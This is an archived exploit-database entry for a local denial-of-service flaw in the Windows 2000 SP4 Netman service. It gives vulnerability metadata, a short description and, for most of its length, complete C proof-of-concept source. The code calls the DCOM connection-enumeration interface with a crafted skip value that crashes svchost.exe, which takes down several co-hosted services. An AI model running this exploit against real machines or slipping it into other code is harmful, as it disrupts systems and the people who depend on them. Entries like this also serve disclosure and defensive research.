Windows Netman Service Local DOS Vulnerability

vendor:

Windows 2000

by:

bkbll

7.5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: Windows 2000

Affected Version From: Windows 2000 SP4

Affected Version To: Windows 2000 SP4

Patch Exists: NO

Related CWE: N/A

CPE: o:microsoft:windows_2000::sp4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2005

Windows Netman Service Local DOS Vulnerability

This vulnerability allows an attacker to cause a denial of service (DoS) condition on a vulnerable system. The vulnerability is due to an error in the handling of certain parameters passed to the 'VCConnectionManagerEnumConnection' interface of the 'Netman' service, which is hosted by the 'svchost.exe' process. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable system. This will cause the 'svchost.exe' process to crash, resulting in a denial of service condition.

Mitigation:

No known mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

/* Windows Netman Service Local DOS Vulnerability.
 * 
 * By bkbll bkbll#cnhonker.net 2005-7-14 2:49??
 *
 * TESTED ON win2k sp4
 * 
 * ??Netman???svchost.exe -k netsvcs??, ????????,????????:
 * 
 * EventSystem,Irmon,RasMan,NtmsSvc,SENS
 * 
 */
#define _WIN32_DCOM

#include <stdio.h>
#include <stdlib.h>
#include <objbase.h>
#include <unknwn.h>
#include <windows.h>

#pragma comment(lib,"ole32")
    
MIDL_INTERFACE("98133274-4B20-11D1-AB01-00805FC1270E")
VCConnectionManagerEnumConnection //: public IDispatch
{
public:
	virtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0;
	virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0;
	virtual ULONG STDMETHODCALLTYPE Release( void) = 0;
	virtual HRESULT STDMETHODCALLTYPE next(void) = 0;
	virtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0;
	virtual HRESULT STDMETHODCALLTYPE reset(void) = 0;
	virtual HRESULT STDMETHODCALLTYPE clone(void) = 0;
};
CLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};
IID IID_IEnumNetConnection  = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};

//???
main(int argc,char **argv)
{
	VCConnectionManagerEnumConnection *clientcall;
	HRESULT hr;
	
	printf("Windows Netman Service Local DOS Vulnerability..\n\n");
	//???
	CoInitializeEx(NULL,COINIT_MULTITHREADED);

	printf("DCOM Client Trying started\n");
	hr = CoCreateInstance(CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetConnection,(void**)&clientcall);
	if (hr != S_OK)
	{
		printf("CoCreateInstanceEx failed:%d\n",GetLastError());
		return -1;
	}
	printf("Exploit netman service ....\n");
	hr = clientcall->skip(0x80000001);//(void**)&p);
	if(SUCCEEDED(hr))
	{
		printf("Call client proc Success.\n");
	}
	else
		printf("Call client proc failed:%d\n",GetLastError());
	hr = clientcall->Release();
	CoUninitialize();
	printf("Client exited.\n");
	return 1;
}

// milw0rm.com [2005-07-14]